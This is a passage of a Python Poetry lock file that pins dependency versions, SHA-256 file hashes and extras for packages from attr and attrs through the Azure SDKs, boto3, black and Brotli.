description = "Simple decorator to set attributes of target function or class in a DRY way."
optional = true
python-versions = "*"
files = [
{file = "attr-0.3.2-py2.py3-none-any.whl", hash = "sha256:4f4bffeea8c27387bde446675a7ac24f3b8fea1075f12d849b5f5c5181fc8336"},
{file = "attr-0.3.2.tar.gz", hash = "sha256:1ceebca768181cdcce9827611b1d728e592be5d293911539ea3d0b0bfa1146f4"},
]
[[package]]
name = "attrs"
version = "23.1.0"
description = "Classes Without Boilerplate"
optional = false
python-versions = ">=3.7"
files = [
{file = "attrs-23.1.0-py3-none-any.whl", hash = "sha256:1f28b4522cdc2fb4256ac1a020c78acf9cba2c6b461ccd2c126f3aa8e8335d04"},
{file = "attrs-23.1.0.tar.gz", hash = "sha256:6279836d581513a26f1bf235f9acd333bc9115683f14f7e8fae46c98fc50e015"},
]
[package.extras]
cov = ["attrs[tests]", "coverage[toml] (>=5.3)"]
dev = ["attrs[docs,tests]", "pre-commit"]
docs = ["furo", "myst-parser", "sphinx", "sphinx-notfound-page", "sphinxcontrib-towncrier", "towncrier", "zope-interface"]
tests = ["attrs[tests-no-zope]", "zope-interface"]
tests-no-zope = ["cloudpickle", "hypothesis", "mypy (>=1.1.1)", "pympler", "pytest (>=4.3.0)", "pytest-mypy-plugins", "pytest-xdist[psutil]"]
[[package]]
name = "audioread"
version = "3.0.1"
description = "Multi-library, cross-platform audio decoding."
optional = true
python-versions = ">=3.6"
files = [
{file = "audioread-3.0.1-py3-none-any.whl", hash = "sha256:4cdce70b8adc0da0a3c9e0d85fb10b3ace30fbdf8d1670fd443929b61d117c33"},
{file = "audioread-3.0.1.tar.gz", hash = "sha256:ac5460a5498c48bdf2e8e767402583a4dcd13f4414d286f42ce4379e8b35066d"},
]
[package.extras]
test = ["tox"]
[[package]]
name = "authlib"
version = "1.2.1"
description = "The ultimate Python library in building OAuth and OpenID Connect servers and clients."
optional = true
python-versions = "*"
files = [
{file = "Authlib-1.2.1-py2.py3-none-any.whl", hash = "sha256:c88984ea00149a90e3537c964327da930779afa4564e354edfd98410bea01911"},
{file = "Authlib-1.2.1.tar.gz", hash = "sha256:421f7c6b468d907ca2d9afede256f068f87e34d23dd221c07d13d4c234726afb"},
]
[package.dependencies]
cryptography = ">=3.2"
[[package]]
name = "awadb"
version = "0.3.10"
description = "AI Native database for embedding vectors"
optional = true
python-versions = ">=3.7"
files = [
{file = "awadb-0.3.10-cp310-cp310-macosx_10_13_x86_64.whl", hash = "sha256:1149b1c6fee95bd6e0f7ff625de060db679ea3985cad2332028eb50a76b9726e"},
{file = "awadb-0.3.10-cp310-cp310-macosx_13_0_arm64.whl", hash = "sha256:a447894ed721184a680566ac8584154d6801d1f99e98996c1d4bd198c022aa07"},
{file = "awadb-0.3.10-cp310-cp310-manylinux1_x86_64.whl", hash = "sha256:ab21a90930f58e666a6874618813cc32a93b1e2fd4e66901c9e5392844165034"},
{file = "awadb-0.3.10-cp311-cp311-macosx_10_13_x86_64.whl", hash = "sha256:bfa1b64dfb9b77710180be9b2971afa6e19608bad54460b819131c2d24efa4f4"},
{file = "awadb-0.3.10-cp311-cp311-macosx_13_0_arm64.whl", hash = "sha256:45a3094119ca3ee1a04abf23a9c22a14bb06cd938a128b28de423031b471787f"},
{file = "awadb-0.3.10-cp311-cp311-manylinux1_x86_64.whl", hash = "sha256:5a8f532621e4e551cdf4ccf0fcfb3a31d3be4d4fe262b26ba7bd7ff769722c9c"},
{file = "awadb-0.3.10-cp37-cp37m-macosx_10_13_x86_64.whl", hash = "sha256:52480a9589e564fb03f504fb2eb26a27fcf552129725fd25a458b0db7d56fde5"},
{file = "awadb-0.3.10-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:d38a1fb571a6e708218c00ec08ffc2b136f9eba8d4308f3d8ed1a3dc89fcdef6"},
{file = "awadb-0.3.10-cp38-cp38-macosx_10_13_x86_64.whl", hash = "sha256:d0e9f2ecb943ea6ba3ccbb849ef79f814fd59efee7d4c698a5220bc3ce308457"},
{file = "awadb-0.3.10-cp38-cp38-macosx_13_0_arm64.whl", hash = "sha256:fb4ab07c75bc3a92be9db2241551f60d705b18bcd48af95d57977084477647d9"},
{file = "awadb-0.3.10-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:157a1f64e8ad3a28cc7cc5a22d39d0703121b1088db46d02adae23ea41a0346c"},
{file = "awadb-0.3.10-cp39-cp39-macosx_10_13_x86_64.whl", hash = "sha256:afad9bec8a0b183de77210cff12fef7d61f8f524cdfd6c0f4c440f7fea763e30"},
{file = "awadb-0.3.10-cp39-cp39-macosx_13_0_arm64.whl", hash = "sha256:71c084197abff80addf3568457a561df54db4bcaf13244f98b68d5fb32d9c2b0"},
{file = "awadb-0.3.10-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:cc9212d8ab743331329b225a594eaa64918e32a06046373bc07821f8e9aa423e"},
]
[package.extras]
test = ["pytest (>=6.0)"]
[[package]]
name = "azure-ai-formrecognizer"
version = "3.3.1"
description = "Microsoft Azure Form Recognizer Client Library for Python"
optional = true
python-versions = ">=3.7"
files = [
{file = "azure-ai-formrecognizer-3.3.1.tar.gz", hash = "sha256:bd5f764cc438529589a4e7d2955a22a0883c7cdce291cf14a53a0d9079c3427b"},
{file = "azure_ai_formrecognizer-3.3.1-py3-none-any.whl", hash = "sha256:761612eb454eb866dc143281ad7ba3169e56f43f8f246b72c8429edd181e5e77"},
]
[package.dependencies]
azure-common = ">=1.1,<2.0"
azure-core = ">=1.23.0,<2.0.0"
msrest = ">=0.6.21"
typing-extensions = ">=4.0.1"
[[package]]
name = "azure-ai-vision"
version = "0.11.1b1"
description = "Microsoft Azure AI Vision SDK for Python"
optional = true
python-versions = ">=3.7"
files = [
{file = "azure_ai_vision-0.11.1b1-py3-none-manylinux1_x86_64.whl", hash = "sha256:6f8563ae26689da6cdee9b2de009a53546ae2fd86c6c180236ce5da5b45f41d3"},
{file = "azure_ai_vision-0.11.1b1-py3-none-win_amd64.whl", hash = "sha256:f5df03b9156feaa1d8c776631967b1455028d30dfd4cd1c732aa0f9c03d01517"},
]
[[package]]
name = "azure-cognitiveservices-speech"
version = "1.32.1"
description = "Microsoft Cognitive Services Speech SDK for Python"
optional = true
python-versions = ">=3.7"
files = [
{file = "azure_cognitiveservices_speech-1.32.1-py3-none-macosx_10_14_x86_64.whl", hash = "sha256:26aa55eb5430f842a1da20dee6c3efe59d27c4209025c579efa63aa438f26298"},
{file = "azure_cognitiveservices_speech-1.32.1-py3-none-macosx_11_0_arm64.whl", hash = "sha256:bb3ddca7f6f001d5e807a79c85e7b7553eb99930752a002216fcd344be5da96c"},
{file = "azure_cognitiveservices_speech-1.32.1-py3-none-manylinux1_x86_64.whl", hash = "sha256:822b411165cbcf7799967f4858df4258ed6d9836506e93b5c7dda2255b29e7bc"},
{file = "azure_cognitiveservices_speech-1.32.1-py3-none-manylinux2014_aarch64.whl", hash = "sha256:27d75095c12077b334fcb35a615d066703ce52adf414a2ccef3f5f402af07138"},
{file = "azure_cognitiveservices_speech-1.32.1-py3-none-win32.whl", hash = "sha256:8ae7dfee8d4d7bc8a4cea585ed223a12878751452ed493f8c80fbc34502096c6"},
{file = "azure_cognitiveservices_speech-1.32.1-py3-none-win_amd64.whl", hash = "sha256:cdb06dd9fe41a7f05fefec99af59630a90ad2da9f61216160410070c2e309948"},
]
[[package]]
name = "azure-common"
version = "1.1.28"
description = "Microsoft Azure Client Library for Python (Common)"
optional = true
python-versions = "*"
files = [
{file = "azure-common-1.1.28.zip", hash = "sha256:4ac0cd3214e36b6a1b6a442686722a5d8cc449603aa833f3f0f40bda836704a3"},
{file = "azure_common-1.1.28-py2.py3-none-any.whl", hash = "sha256:5c12d3dcf4ec20599ca6b0d3e09e86e146353d443e7fcc050c9a19c1f9df20ad"},
]
[[package]]
name = "azure-core"
version = "1.29.5"
description = "Microsoft Azure Core Library for Python"
optional = true
python-versions = ">=3.7"
files = [
{file = "azure-core-1.29.5.tar.gz", hash = "sha256:52983c89d394c6f881a121e5101c5fa67278ca3b1f339c8fb2ef39230c70e9ac"},
{file = "azure_core-1.29.5-py3-none-any.whl", hash = "sha256:0fa04b7b1f7d44a4fb8468c4093deb2ea01fdf4faddbf802ed9205615f99d68c"},
]
[package.dependencies]
requests = ">=2.18.4"
six = ">=1.11.0"
typing-extensions = ">=4.6.0"
[package.extras]
aio = ["aiohttp (>=3.0)"]
[[package]]
name = "azure-cosmos"
version = "4.5.1"
description = "Microsoft Azure Cosmos Client Library for Python"
optional = true
python-versions = ">=3.6"
files = [
{file = "azure-cosmos-4.5.1.tar.gz", hash = "sha256:c4ada8381306eec413c01bc50a778e264dc3f4fafa9d696f9df8436148d2aea8"},
{file = "azure_cosmos-4.5.1-py3-none-any.whl", hash = "sha256:3557570cf7197f50c5b11e655c1fbb1ddf433adc94f91381d671cfad8e2d7bdf"},
]
[package.dependencies]
azure-core = ">=1.23.0,<2.0.0"
[[package]]
name = "azure-identity"
version = "1.15.0"
description = "Microsoft Azure Identity Library for Python"
optional = true
python-versions = ">=3.7"
files = [
{file = "azure-identity-1.15.0.tar.gz", hash = "sha256:4c28fc246b7f9265610eb5261d65931183d019a23d4b0e99357facb2e6c227c8"},
{file = "azure_identity-1.15.0-py3-none-any.whl", hash = "sha256:a14b1f01c7036f11f148f22cd8c16e05035293d714458d6b44ddf534d93eb912"},
]
[package.dependencies]
azure-core = ">=1.23.0,<2.0.0"
cryptography = ">=2.5"
msal = ">=1.24.0,<2.0.0"
msal-extensions = ">=0.3.0,<2.0.0"
[[package]]
name = "azure-search-documents"
version = "11.4.0b8"
description = "Microsoft Azure Cognitive Search Client Library for Python"
optional = true
python-versions = ">=3.7"
files = [
{file = "azure-search-documents-11.4.0b8.zip", hash = "sha256:b178ff52918590191a9cb7f411a9ab3cb517663666a501a3e84b715d19b0d93b"},
{file = "azure_search_documents-11.4.0b8-py3-none-any.whl", hash = "sha256:4137daa2db75bff9484d394c16c0604822a51281cad2f50e11d7c48dd8d4b4cf"},
]
[package.dependencies]
azure-common = ">=1.1,<2.0"
azure-core = ">=1.24.0,<2.0.0"
isodate = ">=0.6.0"
[[package]]
name = "babel"
version = "2.13.1"
description = "Internationalization utilities"
optional = false
python-versions = ">=3.7"
files = [
{file = "Babel-2.13.1-py3-none-any.whl", hash = "sha256:7077a4984b02b6727ac10f1f7294484f737443d7e2e66c5e4380e41a3ae0b4ed"},
{file = "Babel-2.13.1.tar.gz", hash = "sha256:33e0952d7dd6374af8dbf6768cc4ddf3ccfefc244f9986d4074704f2fbd18900"},
]
[package.dependencies]
pytz = {version = ">=2015.7", markers = "python_version < \"3.9\""}
setuptools = {version = "*", markers = "python_version >= \"3.12\""}
[package.extras]
dev = ["freezegun (>=1.0,<2.0)", "pytest (>=6.0)", "pytest-cov"]
[[package]]
name = "backcall"
version = "0.2.0"
description = "Specifications for callback functions passed in to an API"
optional = false
python-versions = "*"
files = [
{file = "backcall-0.2.0-py2.py3-none-any.whl", hash = "sha256:fbbce6a29f263178a1f7915c1940bde0ec2b2a967566fe1c65c1dfb7422bd255"},
{file = "backcall-0.2.0.tar.gz", hash = "sha256:5cbdbf27be5e7cfadb448baf0aa95508f91f2bbc6c6437cd9cd06e2a4c215e1e"},
]
[[package]]
name = "backoff"
version = "2.2.1"
description = "Function decoration for backoff and retry"
optional = true
python-versions = ">=3.7,<4.0"
files = [
{file = "backoff-2.2.1-py3-none-any.whl", hash = "sha256:63579f9a0628e06278f7e47b7d7d5b6ce20dc65c5e96a6f3ca99a6adca0396e8"},
{file = "backoff-2.2.1.tar.gz", hash = "sha256:03f829f5bb1923180821643f8753b0502c3b682293992485b0eef2807afa5cba"},
]
[[package]]
name = "backports-zoneinfo"
version = "0.2.1"
description = "Backport of the standard library zoneinfo module"
optional = true
python-versions = ">=3.6"
files = [
{file = "backports.zoneinfo-0.2.1-cp36-cp36m-macosx_10_14_x86_64.whl", hash = "sha256:da6013fd84a690242c310d77ddb8441a559e9cb3d3d59ebac9aca1a57b2e18bc"},
{file = "backports.zoneinfo-0.2.1-cp36-cp36m-manylinux1_i686.whl", hash = "sha256:89a48c0d158a3cc3f654da4c2de1ceba85263fafb861b98b59040a5086259722"},
{file = "backports.zoneinfo-0.2.1-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:1c5742112073a563c81f786e77514969acb58649bcdf6cdf0b4ed31a348d4546"},
{file = "backports.zoneinfo-0.2.1-cp36-cp36m-win32.whl", hash = "sha256:e8236383a20872c0cdf5a62b554b27538db7fa1bbec52429d8d106effbaeca08"},
{file = "backports.zoneinfo-0.2.1-cp36-cp36m-win_amd64.whl", hash = "sha256:8439c030a11780786a2002261569bdf362264f605dfa4d65090b64b05c9f79a7"},
{file = "backports.zoneinfo-0.2.1-cp37-cp37m-macosx_10_14_x86_64.whl", hash = "sha256:f04e857b59d9d1ccc39ce2da1021d196e47234873820cbeaad210724b1ee28ac"},
{file = "backports.zoneinfo-0.2.1-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:17746bd546106fa389c51dbea67c8b7c8f0d14b5526a579ca6ccf5ed72c526cf"},
{file = "backports.zoneinfo-0.2.1-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:5c144945a7752ca544b4b78c8c41544cdfaf9786f25fe5ffb10e838e19a27570"},
{file = "backports.zoneinfo-0.2.1-cp37-cp37m-win32.whl", hash = "sha256:e55b384612d93be96506932a786bbcde5a2db7a9e6a4bb4bffe8b733f5b9036b"},
{file = "backports.zoneinfo-0.2.1-cp37-cp37m-win_amd64.whl", hash = "sha256:a76b38c52400b762e48131494ba26be363491ac4f9a04c1b7e92483d169f6582"},
{file = "backports.zoneinfo-0.2.1-cp38-cp38-macosx_10_14_x86_64.whl", hash = "sha256:8961c0f32cd0336fb8e8ead11a1f8cd99ec07145ec2931122faaac1c8f7fd987"},
{file = "backports.zoneinfo-0.2.1-cp38-cp38-manylinux1_i686.whl", hash = "sha256:e81b76cace8eda1fca50e345242ba977f9be6ae3945af8d46326d776b4cf78d1"},
{file = "backports.zoneinfo-0.2.1-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:7b0a64cda4145548fed9efc10322770f929b944ce5cee6c0dfe0c87bf4c0c8c9"},
{file = "backports.zoneinfo-0.2.1-cp38-cp38-win32.whl", hash = "sha256:1b13e654a55cd45672cb54ed12148cd33628f672548f373963b0bff67b217328"},
{file = "backports.zoneinfo-0.2.1-cp38-cp38-win_amd64.whl", hash = "sha256:4a0f800587060bf8880f954dbef70de6c11bbe59c673c3d818921f042f9954a6"},
{file = "backports.zoneinfo-0.2.1.tar.gz", hash = "sha256:fadbfe37f74051d024037f223b8e001611eac868b5c5b06144ef4d8b799862f2"},
]
[package.extras]
tzdata = ["tzdata"]
[[package]]
name = "beautifulsoup4"
version = "4.12.2"
description = "Screen-scraping library"
optional = false
python-versions = ">=3.6.0"
files = [
{file = "beautifulsoup4-4.12.2-py3-none-any.whl", hash = "sha256:bd2520ca0d9d7d12694a53d44ac482d181b4ec1888909b035a3dbf40d0f57d4a"},
{file = "beautifulsoup4-4.12.2.tar.gz", hash = "sha256:492bbc69dca35d12daac71c4db1bfff0c876c00ef4a2ffacce226d4638eb72da"},
]
[package.dependencies]
soupsieve = ">1.2"
[package.extras]
html5lib = ["html5lib"]
lxml = ["lxml"]
[[package]]
name = "bibtexparser"
version = "1.4.1"
description = "Bibtex parser for python 3"
optional = true
python-versions = "*"
files = [
{file = "bibtexparser-1.4.1.tar.gz", hash = "sha256:e00e29e24676c4808e0b4333b37bb55cca9cbb7871a56f63058509281588d789"},
]
[package.dependencies]
pyparsing = ">=2.0.3"
[[package]]
name = "black"
version = "23.10.1"
description = "The uncompromising code formatter."
optional = false
python-versions = ">=3.8"
files = [
{file = "black-23.10.1-cp310-cp310-macosx_10_16_arm64.whl", hash = "sha256:ec3f8e6234c4e46ff9e16d9ae96f4ef69fa328bb4ad08198c8cee45bb1f08c69"},
{file = "black-23.10.1-cp310-cp310-macosx_10_16_x86_64.whl", hash = "sha256:1b917a2aa020ca600483a7b340c165970b26e9029067f019e3755b56e8dd5916"},
{file = "black-23.10.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9c74de4c77b849e6359c6f01987e94873c707098322b91490d24296f66d067dc"},
{file = "black-23.10.1-cp310-cp310-win_amd64.whl", hash = "sha256:7b4d10b0f016616a0d93d24a448100adf1699712fb7a4efd0e2c32bbb219b173"},
{file = "black-23.10.1-cp311-cp311-macosx_10_16_arm64.whl", hash = "sha256:b15b75fc53a2fbcac8a87d3e20f69874d161beef13954747e053bca7a1ce53a0"},
{file = "black-23.10.1-cp311-cp311-macosx_10_16_x86_64.whl", hash = "sha256:e293e4c2f4a992b980032bbd62df07c1bcff82d6964d6c9496f2cd726e246ace"},
{file = "black-23.10.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7d56124b7a61d092cb52cce34182a5280e160e6aff3137172a68c2c2c4b76bcb"},
{file = "black-23.10.1-cp311-cp311-win_amd64.whl", hash = "sha256:3f157a8945a7b2d424da3335f7ace89c14a3b0625e6593d21139c2d8214d55ce"},
{file = "black-23.10.1-cp38-cp38-macosx_10_16_arm64.whl", hash = "sha256:cfcce6f0a384d0da692119f2d72d79ed07c7159879d0bb1bb32d2e443382bf3a"},
{file = "black-23.10.1-cp38-cp38-macosx_10_16_x86_64.whl", hash = "sha256:33d40f5b06be80c1bbce17b173cda17994fbad096ce60eb22054da021bf933d1"},
{file = "black-23.10.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:840015166dbdfbc47992871325799fd2dc0dcf9395e401ada6d88fe11498abad"},
{file = "black-23.10.1-cp38-cp38-win_amd64.whl", hash = "sha256:037e9b4664cafda5f025a1728c50a9e9aedb99a759c89f760bd83730e76ba884"},
{file = "black-23.10.1-cp39-cp39-macosx_10_16_arm64.whl", hash = "sha256:7cb5936e686e782fddb1c73f8aa6f459e1ad38a6a7b0e54b403f1f05a1507ee9"},
{file = "black-23.10.1-cp39-cp39-macosx_10_16_x86_64.whl", hash = "sha256:7670242e90dc129c539e9ca17665e39a146a761e681805c54fbd86015c7c84f7"},
{file = "black-23.10.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5ed45ac9a613fb52dad3b61c8dea2ec9510bf3108d4db88422bacc7d1ba1243d"},
{file = "black-23.10.1-cp39-cp39-win_amd64.whl", hash = "sha256:6d23d7822140e3fef190734216cefb262521789367fbdc0b3f22af6744058982"},
{file = "black-23.10.1-py3-none-any.whl", hash = "sha256:d431e6739f727bb2e0495df64a6c7a5310758e87505f5f8cde9ff6c0f2d7e4fe"},
{file = "black-23.10.1.tar.gz", hash = "sha256:1f8ce316753428ff68749c65a5f7844631aa18c8679dfd3ca9dc1a289979c258"},
]
[package.dependencies]
click = ">=8.0.0"
mypy-extensions = ">=0.4.3"
packaging = ">=22.0"
pathspec = ">=0.9.0"
platformdirs = ">=2"
tomli = {version = ">=1.1.0", markers = "python_version < \"3.11\""}
typing-extensions = {version = ">=4.0.1", markers = "python_version < \"3.11\""}
[package.extras]
colorama = ["colorama (>=0.4.3)"]
d = ["aiohttp (>=3.7.4)"]
jupyter = ["ipython (>=7.8.0)", "tokenize-rt (>=3.2.0)"]
uvloop = ["uvloop (>=0.15.2)"]
[[package]]
name = "bleach"
version = "6.1.0"
description = "An easy safelist-based HTML-sanitizing tool."
optional = false
python-versions = ">=3.8"
files = [
{file = "bleach-6.1.0-py3-none-any.whl", hash = "sha256:3225f354cfc436b9789c66c4ee030194bee0568fbf9cbdad3bc8b5c26c5f12b6"},
{file = "bleach-6.1.0.tar.gz", hash = "sha256:0a31f1837963c41d46bbf1331b8778e1308ea0791db03cc4e7357b97cf42a8fe"},
]
[package.dependencies]
six = ">=1.9.0"
webencodings = "*"
[package.extras]
css = ["tinycss2 (>=1.1.0,<1.3)"]
[[package]]
name = "blinker"
version = "1.6.3"
description = "Fast, simple object-to-object and broadcast signaling"
optional = true
python-versions = ">=3.7"
files = [
{file = "blinker-1.6.3-py3-none-any.whl", hash = "sha256:296320d6c28b006eb5e32d4712202dbcdcbf5dc482da298c2f44881c43884aaa"},
{file = "blinker-1.6.3.tar.gz", hash = "sha256:152090d27c1c5c722ee7e48504b02d76502811ce02e1523553b4cf8c8b3d3a8d"},
]
[[package]]
name = "boto3"
version = "1.28.64"
description = "The AWS SDK for Python"
optional = true
python-versions = ">= 3.7"
files = [
{file = "boto3-1.28.64-py3-none-any.whl", hash = "sha256:a99150a30c038c73e89662836820a8cce914afab5ea377942a37c484b85f4438"},
{file = "boto3-1.28.64.tar.gz", hash = "sha256:a5cf93b202568e9d378afdc84be55a6dedf11d30156289fe829e23e6d7dccabb"},
]
[package.dependencies]
botocore = ">=1.31.64,<1.32.0"
jmespath = ">=0.7.1,<2.0.0"
s3transfer = ">=0.7.0,<0.8.0"
[package.extras]
crt = ["botocore[crt] (>=1.21.0,<2.0a0)"]
[[package]]
name = "botocore"
version = "1.31.64"
description = "Low-level, data-driven core of boto 3."
optional = true
python-versions = ">= 3.7"
files = [
{file = "botocore-1.31.64-py3-none-any.whl", hash = "sha256:7b709310343a5b430ec9025b2e17c0bac6b16c05f1ac1d9521dece3f10c71bac"},
{file = "botocore-1.31.64.tar.gz", hash = "sha256:d8eb4b724ac437343359b318d73de0cfae0fecb24095827e56135b0ad6b44caf"},
]
[package.dependencies]
jmespath = ">=0.7.1,<2.0.0"
python-dateutil = ">=2.1,<3.0.0"
urllib3 = [
{version = ">=1.25.4,<2.1", markers = "python_version >= \"3.10\""},
{version = ">=1.25.4,<1.27", markers = "python_version < \"3.10\""},
]
[package.extras]
crt = ["awscrt (==0.16.26)"]
[[package]]
name = "brotli"
version = "1.1.0"
description = "Python bindings for the Brotli compression library"
optional = true
python-versions = "*"
files = [
{file = "Brotli-1.1.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:e1140c64812cb9b06c922e77f1c26a75ec5e3f0fb2bf92cc8c58720dec276752"},
{file = "Brotli-1.1.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c8fd5270e906eef71d4a8d19b7c6a43760c6abcfcc10c9101d14eb2357418de9"},
{file = "Brotli-1.1.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1ae56aca0402a0f9a3431cddda62ad71666ca9d4dc3a10a142b9dce2e3c0cda3"},
{file = "Brotli-1.1.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:43ce1b9935bfa1ede40028054d7f48b5469cd02733a365eec8a329ffd342915d"},
{file = "Brotli-1.1.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:7c4855522edb2e6ae7fdb58e07c3ba9111e7621a8956f481c68d5d979c93032e"},
{file = "Brotli-1.1.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:38025d9f30cf4634f8309c6874ef871b841eb3c347e90b0851f63d1ded5212da"},
{file = "Brotli-1.1.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:e6a904cb26bfefc2f0a6f240bdf5233be78cd2488900a2f846f3c3ac8489ab80"},
{file = "Brotli-1.1.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:a37b8f0391212d29b3a91a799c8e4a2855e0576911cdfb2515487e30e322253d"},
{file = "Brotli-1.1.0-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:e84799f09591700a4154154cab9787452925578841a94321d5ee8fb9a9a328f0"},
{file = "Brotli-1.1.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:f66b5337fa213f1da0d9000bc8dc0cb5b896b726eefd9c6046f699b169c41b9e"},
{file = "Brotli-1.1.0-cp310-cp310-win32.whl", hash = "sha256:be36e3d172dc816333f33520154d708a2657ea63762ec16b62ece02ab5e4daf2"},
{file = "Brotli-1.1.0-cp310-cp310-win_amd64.whl", hash = "sha256:0c6244521dda65ea562d5a69b9a26120769b7a9fb3db2fe9545935ed6735b128"},
{file = "Brotli-1.1.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:a3daabb76a78f829cafc365531c972016e4aa8d5b4bf60660ad8ecee19df7ccc"},
{file = "Brotli-1.1.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:c8146669223164fc87a7e3de9f81e9423c67a79d6b3447994dfb9c95da16e2d6"},
{file = "Brotli-1.1.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:30924eb4c57903d5a7526b08ef4a584acc22ab1ffa085faceb521521d2de32dd"},
{file = "Brotli-1.1.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ceb64bbc6eac5a140ca649003756940f8d6a7c444a68af170b3187623b43bebf"},
{file = "Brotli-1.1.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a469274ad18dc0e4d316eefa616d1d0c2ff9da369af19fa6f3daa4f09671fd61"},
{file = "Brotli-1.1.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:524f35912131cc2cabb00edfd8d573b07f2d9f21fa824bd3fb19725a9cf06327"},
{file = "Brotli-1.1.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:5b3cc074004d968722f51e550b41a27be656ec48f8afaeeb45ebf65b561481dd"},
{file = "Brotli-1.1.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:19c116e796420b0cee3da1ccec3b764ed2952ccfcc298b55a10e5610ad7885f9"},
{file = "Brotli-1.1.0-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:510b5b1bfbe20e1a7b3baf5fed9e9451873559a976c1a78eebaa3b86c57b4265"},
{file = "Brotli-1.1.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:a1fd8a29719ccce974d523580987b7f8229aeace506952fa9ce1d53a033873c8"},
{file = "Brotli-1.1.0-cp311-cp311-win32.whl", hash = "sha256:39da8adedf6942d76dc3e46653e52df937a3c4d6d18fdc94a7c29d263b1f5b50"},
{file = "Brotli-1.1.0-cp311-cp311-win_amd64.whl", hash = "sha256:aac0411d20e345dc0920bdec5548e438e999ff68d77564d5e9463a7ca9d3e7b1"},
{file = "Brotli-1.1.0-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:316cc9b17edf613ac76b1f1f305d2a748f1b976b033b049a6ecdfd5612c70409"},
{file = "Brotli-1.1.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:caf9ee9a5775f3111642d33b86237b05808dafcd6268faa492250e9b78046eb2"},
{file = "Brotli-1.1.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:70051525001750221daa10907c77830bc889cb6d865cc0b813d9db7fefc21451"},
{file = "Brotli-1.1.0-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:7f4bf76817c14aa98cc6697ac02f3972cb8c3da93e9ef16b9c66573a68014f91"},
{file = "Brotli-1.1.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d0c5516f0aed654134a2fc936325cc2e642f8a0e096d075209672eb321cff408"},
{file = "Brotli-1.1.0-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6c3020404e0b5eefd7c9485ccf8393cfb75ec38ce75586e046573c9dc29967a0"},
{file = "Brotli-1.1.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:4ed11165dd45ce798d99a136808a794a748d5dc38511303239d4e2363c0695dc"},
{file = "Brotli-1.1.0-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:4093c631e96fdd49e0377a9c167bfd75b6d0bad2ace734c6eb20b348bc3ea180"},
{file = "Brotli-1.1.0-cp312-cp312-musllinux_1_1_ppc64le.whl", hash = "sha256:7e4c4629ddad63006efa0ef968c8e4751c5868ff0b1c5c40f76524e894c50248"},
{file = "Brotli-1.1.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:861bf317735688269936f755fa136a99d1ed526883859f86e41a5d43c61d8966"},
{file = "Brotli-1.1.0-cp312-cp312-win32.whl", hash = "sha256:5f4d5ea15c9382135076d2fb28dde923352fe02951e66935a9efaac8f10e81b0"},
{file = "Brotli-1.1.0-cp312-cp312-win_amd64.whl", hash = "sha256:906bc3a79de8c4ae5b86d3d75a8b77e44404b0f4261714306e3ad248d8ab0951"},
{file = "Brotli-1.1.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:a090ca607cbb6a34b0391776f0cb48062081f5f60ddcce5d11838e67a01928d1"},
{file = "Brotli-1.1.0-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2de9d02f5bda03d27ede52e8cfe7b865b066fa49258cbab568720aa5be80a47d"},
{file = "Brotli-1.1.0-cp36-cp36m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2333e30a5e00fe0fe55903c8832e08ee9c3b1382aacf4db26664a16528d51b4b"},
{file = "Brotli-1.1.0-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:4d4a848d1837973bf0f4b5e54e3bec977d99be36a7895c61abb659301b02c112"},
